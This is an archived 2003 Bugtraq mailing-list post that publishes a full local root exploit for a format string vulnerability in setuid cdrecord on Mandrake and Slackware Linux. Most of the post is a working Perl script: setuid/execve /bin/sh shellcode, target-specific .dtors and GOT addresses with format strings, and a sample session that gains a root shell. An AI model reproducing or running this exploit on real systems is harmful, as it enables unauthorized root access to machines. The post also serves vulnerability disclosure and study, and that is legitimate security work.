Cdrecord local root exploit.

From: yjm01 (yjm01_at_terra.com.br)
Date: 05/13/03

  • Next message: Albert Puigsech Galicia: "More and More SQL injection on PHP-Nuke 6.5."
    Date: Tue, 13 May 2003 20:52:01 +0000
    To: "bugtraq" <bugtraq@securityfocus.com>
    
    

    Priv8security.com Hi, here it is local root exploit cdrecord format string bug Cdrecord come suid root by default on mandrake distro and it can be executed by anybody. [wsxz@localhost wsxz]$ ls -l /usr/bin/cdrecord -rwsr-sr-x 1 root cdwriter 278156 Jan 6 07:2 /usr/bin/cdrecord* here goes the code or get it on http://releases.priv8security.org/priv8cdr.pl priv8cdr.pl --------cut here------------------------------------------------------ #!/usr/bin/perl ########################################################### #Priv8security.com Cdrecord version 2.0 and < local root exploit. # # Version 1.10 is NOT VULN!!!! # # [wsxz@localhost buffer]$ perl priv8cdr.pl 4 # Using target number 4 # Using Mr .dtors 0x808c82c # Cdrecord 2.0 (i586-mandrake-linux-gnu) Copyright (C) 1995-2002 Jrg Schilling # scsidev: '11۰1ذ.^1FF # # V # 1@/bin/sh%.134802669x%x%x%x%x%x%x%x%x%n:' # devname: '11۰1ذ.^1FF # # V # 1@/bin/sh%.134802669x%x%x%x%x%x%x%x%x%n' # scsibus: -1 target: -1 lun: -1 # Warning: Open by 'devname' is unintentional and not supported. # /usr/bin/cdrecord: No such file or directory. Cannot open '. Cannot open SCSI driver. # /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you are root. # /usr/bin/cdrecord: For possible transport specifiers try 'cdrecord dev=help'. # sh-2.05b# id # uid=0(root) gid=0(root) groups=503(wsxz) # sh-2.05b# ##################################################### $shellcode = "\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0 "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0 "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89". "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c". "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff". "\xff\xff/bin/sh"; $cdrecordpath = "/usr/bin/cdrecord"; $nop = "\x90"; # x86 NOP $offset = 0; # Default offset to try. if (@ARGV == 1 || @ARGV == 2) { $target = $ARGV[0]; $offset = $ARGV[1]; }else{ printf(" Priv8security.com Cdrecord local root exploit!!\n"); printf(" usage: $0 target\n"); printf(" List of targets:\n"); printf(" 1 - Linux Mandrake 8.2 Cdrecord 1.11a15\n"); printf(" 2 - Linux Mandrake 9.0 Cdrecord 1.11a32\n"); printf(" 3 - Linux Slackware 8.1 Cdrecord 1.11a24 not suid by default!!!\n"); printf(" 4 - Linux Mandrake 9.1 Cdrecord 2.0\n"); exit(1); } if ( $target eq "1" ) { $retword = 0x0807af38; #Mr .dtors ;) $fmtstring = "%.134727238x%x%x%x%x%x%x%x%x%n:"; } if ( $target eq "2" ) { # $retword = 0x08084578; #.dtors $retword = 0x08084684; #.GOT exit $fmtstring = "%.134769064x%x%x%x%x%x%x%x%x%n:"; } if ( $target eq "3" ) { $retword = 0x0807f658; $fmtstring = "%.134745456x%x%x%x%x%x%x%x%x%x%x%n:"; } if ( $target eq "4" ) { $retword = 0x0808c82c; #.GOT exit $fmtstring = "%.134802669x%x%x%x%x%x%x%x%x%n:"; } printf("Using target number %d\n", $target); printf("Using Mr .dtors 0x%x\n",$retword); $new_retword = pack('l', ($retword)); $new_retshell = pack('l', ($retshell)); $buffer2 = $new_retword; $buffer2 .= $nop x 150; $buffer2 .= $shellcode; $buffer2 .= $fmtstring; exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'"); --------cut here-----------------------------------------------


  • Next message: Albert Puigsech Galicia: "More and More SQL injection on PHP-Nuke 6.5."

    Relevant Pages

    • [EXPL] Cdrecord Format String Vulnerability
      ... A format string vulnerability in Cdrecord allows ... that have set the program to setuid, Slackware and Mandrake). ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • cdrecord 2.01 returning error "unknown error 255" when burning or erasing CDRW
      ... With the default kernel shipped with Mandrake 10 I have ... /usr/bin/cdrecord: For possible targets try 'cdrecord -scanbus'. ... burner although with the original configuration of Mandrake it was ...
      (comp.os.linux.setup)